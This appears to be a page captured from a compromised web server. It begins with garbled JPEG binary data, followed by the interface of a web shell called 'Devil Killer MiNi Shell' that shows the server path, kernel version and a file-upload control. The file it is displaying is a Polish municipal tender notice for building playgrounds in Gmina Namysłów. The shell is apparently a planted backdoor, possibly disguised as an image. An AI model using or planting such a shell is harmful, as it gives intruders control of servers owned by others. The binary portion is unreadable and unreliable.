JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250620/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250620/0028648101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa terenów rekreacyjnych na terenie Gminy Namysłów - etap 2 w ramach zadań: część 1: Budowa placu zabaw w Brzozowcu, część 2: Rozbudowa placu zabaw w Michalicach - etap II. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413159</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisława Dubois 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Namysłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@namyslow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.namyslow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa terenów rekreacyjnych na terenie Gminy Namysłów - etap 2 w ramach zadań: część 1: Budowa placu zabaw w Brzozowcu, część 2: Rozbudowa placu zabaw w Michalicach - etap II. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-08954a46-baab-47c2-b86e-ffad10b0038b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00286481</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00021318/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Budowa terenów rekreacyjnych na terenie Gminy Namysłów - etap 2: Część 1: Budowa placu zabaw w Brzozowcu, Część 2: Rozbudowa placu zabaw w Michalicach - etap II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.namyslow.eu; https://namyslow.ezamawiajacy.pl/app/login <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://namyslow.ezamawiajacy.pl/app/login</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne zgodnie z punktem 8 i 12 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pana/Pani danych osobowych jest Urząd Miejski reprezentowana przez Burmistrza Namysłowa z siedzibą w Namysłowie, przy ul. Stanisława Dubois 3. Może się Pan/Pani z nim skontaktować drogą<br/>elektroniczną na adres e-mail: urzad.miejski@namyslow.eu, telefonicznie pod numerem +48 77 41 90 300 lub tradycyjną pocztą na<br/>adres wskazany powyżej.<br/>2. W sprawach związanych z Pana/Pani danymi proszę kontaktować się z Inspektorem Ochrony Danych pod adresem e-mail<br/>iod@comp-net.pl<br/>3. Pana/Pani dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego na<br/>budowę terenów rekreacyjnych na terenie Gminy Namysłów - etap 2 w ramach zadań: część 1: Budowa placu zabaw w Brzozowcu,<br/>część 2: Rozbudowa placu zabaw w Michalicach - etap II, nr ZP.271.106.2025.AD prowadzonym w trybie podstawowym (art. 275. pkt<br/>2 ustawy Pzp); na podstawie art. 6 ust. 1 lit. C RODO.<br/>4. W niektórych sytuacjach Pana/Pani dane osobowe mogą być udostępniane, jeśli będzie to konieczne do wykonywania ustawowych zadań urzędu. Będziemy przekazywać dane wyłącznie:<br/>1) podmiotom przetwarzającym, którym zlecimy przetwarzanie Pana/Pani danych;<br/>2) innym odbiorcom danych, np. bankom, ubezpieczycielom, kancelariom prawnym.<br/>5. Pana/Pani dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej.<br/>6. Pana/Pani dane osobowe będą przechowywane przez okres co najmniej 7 lat od dnia wpływu ostatniej płatności na konto<br/>beneficjenta (płatności na realizację projektu), a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą w/w przedział<br/>czasowy, okres przechowywania obejmuje ten termin.<br/>7. Ma Pan/Pani prawo dostępu do swoich danych, ich sprostowania, usunięcia lub ograniczenia przetwarzania.<br/>8. Ma Pan/Pani prawo wniesienia sprzeciwu wobec przetwarzania.<br/>9. Ma Pan/Pani prawo do cofnięcia zgody w dowolnym momencie. Skorzystanie z prawa do cofnięcia zgody nie ma wpływu na<br/>przetwarzanie, które miało miejsce do momentu wycofania zgody.<br/>10. Ma Pan/Pani także prawo do przenoszenia danych.<br/>11. Przysługuje Panu/Pani prawo wniesienia skargi do Organu Nadzorczego, gdy stwierdzi Pan/Pani naruszenie przetwarzania danych osobowych Pana/Pani dotyczących.<br/>12. Podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Jest Pan/Pani zobowiązany/a do ich podania, a konsekwencją niepodania danych osobowych będą konsekwencje wynikające z ustawy Pzp.<br/>13. Pana/Pani dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Pozostałe informacje zostały zawarte w punkcie 20 dodatkowych postanowień SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.106.2025.AD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1:	Budowa placu zabaw w Brzozowcu.<br/>Przedmiotem zamówienia jest „Budowa placu zabaw w Brzozowcu” i obejmuje w szczególności:<br/>1)	dostawę i montaż urządzenia zabawowego – bujak na sprężynie – skuter/motor z jednym siedziskiem w owalnym kształcie wykonanym z polietylenu HDPE o grubości min. 15 mm odpornym na wilgotność i UV umiejscowionym na sprężynie wykonanej ze stali sprężynowej <br/>o średnicy pręta min. 20 mm, średnica sprężyny min. 180 mm, sprężyna ocynkowana i pomalowana proszkowo farbami poliestrowymi lub ze stali nierdzewnej. Uchwyty oraz podnóżki wykonane ze stali, zabezpieczone miękką gumą EPDM. Elementy skutera/motoru powinny być wykonane z polietylenu HDPE o grubości min. 15 mm, połączone ze sobą na łączniki ze stali nierdzewnej zakończone zaślepkami z gumy. Konstrukcja bujaka wykonana ze stali cynkowanej i malowanej proszkowo farbami poliestrowymi lub ze sali nierdzewnej. Wymiary urządzenia: wysokość maksymalnie do 100 cm, siedzisko na wysokości max. 55 cm, maksymalna szerokość urządzenia 40 cm, maksymalna długość 120 cm, maksymalna wysokość swobodnego upadku – 55 cm; maksymalna strefa bezpieczeństwa 10,00 m2; konstrukcja główna w kolorze szarym, pozostałe elementy w kolorystyce dowolnej; kotwienie w płaskim gruncie na fundamencie betonowym prefabrykowanym lub wylewanym z betonu min. C20/25;<br/>2)	dostawę i montaż urządzenia zabawowego – huśtawka wahadłowa trzystanowiskowa z jednym siedziskiem kubełkowym, jednym siedziskiem płaskim, jednym bocianim gniazdem; sześć nóg, wykonanych z elementów o profilu kwadratowym min. 80x80x2 mm lub o profilu okrągłym min. 85x2 mm; konstrukcja belki głównej o profilu kwadratowym min. 80x80x2 mm lub o profilu okrągłym min. 80x2 mm, konstrukcja wykonana ze stali nierdzewnej lub stali ocynkowanej i malowanej proszkowo. Siedzisko koszykowe i siedzisko płaskie o konstrukcji aluminiowej lub stalowej pokryte miękkim poliuretanem; bocianie gniazdo o średnicy maksymalnej do 110 cm, metalowa rama powinna być opleciona miękką liną polipropylenową, natomiast wypełnienie powinno być wykonane z liny polipropylenowych z rdzeniem stalowym. Łańcuchy ze stali nierdzewnej, kalibrowane, uniemożliwiające zakleszczenie palców; zawiesia ze stali nierdzewnej; śruby ze stali nierdzewnej i/lub śruby zakryte plastikowymi kapslami; bezpieczne zaślepki na górze wykonane w postaci miękkiej gumy EPDM. Wymiary urządzenia: maksymalna wysokość urządzenia 260 cm, szerokość – wymiar A: maksymalnie do 230 cm, wymiar B: maksymalnie 650 cm, maksymalna wysokość swobodnego upadku 135 cm; maksymalna strefa bezpieczeństwa 45,00 m2; konstrukcja główna w kolorze szarym, pozostałe elementy w kolorystyce dowolnej; kotwienie w płaskim gruncie na fundamencie betonowym prefabrykowanym lub wylewanym z betonu min. C20/25;<br/>3)	dostawę i montaż – tablicy z regulaminem, o konstrukcji wykonanej ze stali ocynkowanej i malowanej proszkowo lub ze stali nierdzewnej, na jednej lub dwóch nogach; tablica informacyjna musi być wykonana z materiału odpornego na zniszczenia oraz odpornego na czynniki atmosferyczne i promieniowanie UV. Wysokość tablicy – maksymalnie do 220 cm;<br/>4)	wykonanie nawierzchni bezpiecznej piaskowej bez obrzeży wokół urządzeń zabawowych:<br/>a)	huśtawka trzystanowiskowa: w kształcie prostokąta długości i szerokości odpowiadającej wymiarom huśtawki 7,50 do 8,00 m i 6,20 do 6,50 m,<br/>b)	piasek kopany o frakcji 0,2 – 2 mm o niskim wskaźniku cząstek iłowych, korytowanie na głębokość 30 cm, transport wykorytowanej ziemi do 24 km.<br/><br/>Zamówienie należy wykonać na podstawie mapy zagospodarowania terenu, specyfikacji technicznej wykonania i odbioru robót budowlanych i przedmiaru robót oraz aktualnie obowiązujących przepisów prawa budowlanego i norm budowlanych. <br/>Na przedmiot zamówienia Wykonawca udzieli gwarancji na okres minimum 36 miesięcy maksymalnie 60 miesięcy licząc od daty końcowego protokołu odbioru robót, zobowiązując się do bezpłatnego usuwania wad fizycznych przedmiotu zamówienia, jeżeli wady te ujawnią się we wskazanym okresie. <br/>Wszystkie urządzenia muszą być wykonane z bezpiecznych i trwałych materiałów zgodnie z polskimi normami PN-EN 1176 oraz warunkami bezpieczeństwa. Muszą posiadać certyfikat wystawiony przez akredytowaną jednostkę lub deklarację zgodności producenta lub dostawcy, bądź raport kontrolny przeprowadzony przez producenta lub instytucję zewnętrzną (akredytowane laboratorium). Ponadto każde z urządzeń musi posiadać tabliczkę znamionową, która powinna podawać informacje o producencie, dacie produkcji, numerze seryjnym i numerze normy, zgodnie z którą urządzenie wyprodukowano. <br/>WYMAGANIA:<br/>Wykonawca do oferty przetargowej załączy:<br/>1)	karty materiałowe urządzeń przedstawiające rysunki lub zdjęcia oferowanych urządzeń, <br/>w których powinny znajdować się dokładne wymiary urządzeń, wymiary stref bezpieczeństwa, kolorystyka urządzeń, rodzaj zastosowanych materiałów, sposób mocowania do podłoża;<br/>2)	certyfikaty potwierdzające zgodność z Polską Normą serii PN EN 1176 – wyposażenie placów zabaw i nawierzchnie, wydane przez akredytowaną jednostkę certyfikującą. Certyfikat musi dotyczyć poszczególnych urządzeń, nie może dotyczyć systemu urządzeń. Dokumenty muszą być aktualne na dzień składania ofert.<br/>UWAGA:<br/>Wszystkie nazwy własne podane w niniejszym opisie przedmiotu zamówienia oraz przedmiarze robót należy traktować jako określenie standardu urządzeń, materiałów i rozwiązań technicznych. Parametry techniczno-eksploatacyjne zastosowanych urządzeń powinny być co najmniej takie, jak podane <br/>w niniejszym opisie przedmiotu zamówienia oraz przedmiarze robót. Dopuszcza się rozbieżność wymiarów urządzeń i stref bezpieczeństwa w tolerancji +/- 2%.<br/>Podzielenie zamówienie na części, w opinii Zamawiającego, spowoduje zoptymalizowanie ofert przedstawionych przez Wykonawców zarówno pod względem jakościowym jak i cenowym a dodatkowo zabezpieczy Zamawiającego przed nierozstrzygnięciem zamówienia ze względu na niezłożenie oferty całościowej przez żadnego z Wykonawców.<br/>Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w SWZ i ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212140-9 - Obiekty rekreacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2:	Rozbudowa placu zabaw w Michalicach - etap II.<br/>Przedmiotem zamówienia jest „Rozbudowa placu zabaw w Michalicach – etap II” i obejmuje w szczególności:<br/>1)	dostawę i montaż urządzenia zabawowego – huśtawka wahadłowa trzystanowiskowa z jednym siedziskiem kubełkowym, jednym siedziskiem płaskim, jednym bocianim gniazdem; sześć nóg, wykonanych z elementów o profilu kwadratowym min. 80x80x2 mm lub o profilu okrągłym min. 85x2 mm; konstrukcja belki głównej o profilu kwadratowym min. 80x80x2 mm lub o profilu okrągłym min. 80x2 mm, konstrukcja wykonana ze stali nierdzewnej lub stali ocynkowanej i malowanej proszkowo. Siedzisko koszykowe i siedzisko płaskie o konstrukcji aluminiowej lub stalowej pokryte miękkim poliuretanem; bocianie gniazdo o średnicy maksymalnej do 110 cm, metalowa rama powinna być opleciona miękką liną polipropylenową, natomiast wypełnienie powinno być wykonane z liny polipropylenowych z rdzeniem stalowym. Łańcuchy ze stali nierdzewnej, kalibrowane, uniemożliwiające zakleszczenie palców; zawiesia ze stali nierdzewnej; śruby ze stali nierdzewnej i/lub śruby zakryte plastikowymi kapslami; bezpieczne zaślepki na górze wykonane w postaci miękkiej gumy EPDM. Wymiary urządzenia: maksymalna wysokość urządzenia 260 cm, szerokość – wymiar A: maksymalnie do 230 cm, wymiar B: maksymalnie 650 cm, maksymalna wysokość swobodnego upadku 135 cm; maksymalna strefa bezpieczeństwa 45,00 m2; konstrukcja główna w kolorze szarym, pozostałe elementy w kolorystyce dowolnej; kotwienie w płaskim gruncie na fundamencie betonowym prefabrykowanym lub wylewanym z betonu min. C20/25;<br/>2)	wykonanie nawierzchni bezpiecznej piaskowej bez obrzeży wokół urządzeń zabawowych:<br/>a)	huśtawka trzystanowiskowa: w kształcie prostokąta długości i szerokości odpowiadającej wymiarom huśtawki od 7,50 do 8,00 m i od 6,20 do 6,50 m,<br/>b)	piasek kopany o frakcji 0,2 – 2 mm o niskim wskaźniku cząstek iłowych, korytowanie na głębokość 30 cm, transport wykorytowanej ziemi do 10 km. <br/>Zamówienie należy wykonać na podstawie mapy zagospodarowania terenu, specyfikacji technicznej wykonania i odbioru robót budowlanych i przedmiaru robót oraz aktualnie obowiązujących przepisów prawa budowlanego i norm budowlanych. <br/>Na przedmiot zamówienia Wykonawca udzieli gwarancji na okres minimum 36 miesięcy maksymalnie 60 miesięcy licząc od daty końcowego protokołu odbioru robót, zobowiązując się do bezpłatnego usuwania wad fizycznych przedmiotu zamówienia, jeżeli wady te ujawnią się we wskazanym okresie. <br/>Wszystkie urządzenia muszą być wykonane z bezpiecznych i trwałych materiałów zgodnie z polskimi normami PN-EN 1176 oraz warunkami bezpieczeństwa. Muszą posiadać certyfikat wystawiony przez akredytowaną jednostkę lub deklarację zgodności producenta lub dostawcy, bądź raport kontrolny przeprowadzony przez producenta lub instytucję zewnętrzną (akredytowane laboratorium). Ponadto każde z urządzeń musi posiadać tabliczkę znamionową, która powinna podawać informacje o producencie, dacie produkcji, numerze seryjnym i numerze normy, zgodnie z którą urządzenie wyprodukowano. <br/>WYMAGANIA:<br/>Wykonawca do oferty przetargowej załączy:<br/>1)	karty materiałowe urządzeń przedstawiające rysunki lub zdjęcia oferowanych urządzeń, w których powinny znajdować się dokładne wymiary urządzeń, wymiary stref bezpieczeństwa, kolorystyka urządzeń, rodzaj zastosowanych materiałów, sposób mocowania do podłoża;<br/>2)	certyfikaty potwierdzające zgodność z Polską Normą serii PN EN 1176 – wyposażenie placów zabaw i nawierzchnie, wydane przez akredytowaną jednostkę certyfikującą. Certyfikat musi dotyczyć poszczególnych urządzeń, nie może dotyczyć systemu urządzeń. Dokumenty muszą być aktualne na dzień składania ofert.<br/>UWAGA:<br/>Wszystkie nazwy własne podane w niniejszym opisie przedmiotu zamówienia oraz przedmiarze robót należy traktować jako określenie standardu urządzeń, materiałów i rozwiązań technicznych. Parametry techniczno-eksploatacyjne zastosowanych urządzeń powinny być co najmniej takie, jak podane w niniejszym opisie przedmiotu zamówienia oraz przedmiarze robót. Dopuszcza się rozbieżność wymiarów urządzeń i stref bezpieczeństwa w tolerancji +/- 2%.<br/>Podzielenie zamówienie na części, w opinii Zamawiającego, spowoduje zoptymalizowanie ofert przedstawionych przez Wykonawców zarówno pod względem jakościowym jak i cenowym a dodatkowo zabezpieczy Zamawiającego przed nierozstrzygnięciem zamówienia ze względu na niezłożenie oferty całościowej przez żadnego z Wykonawców.<br/>Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w SWZ i ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212140-9 - Obiekty rekreacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) 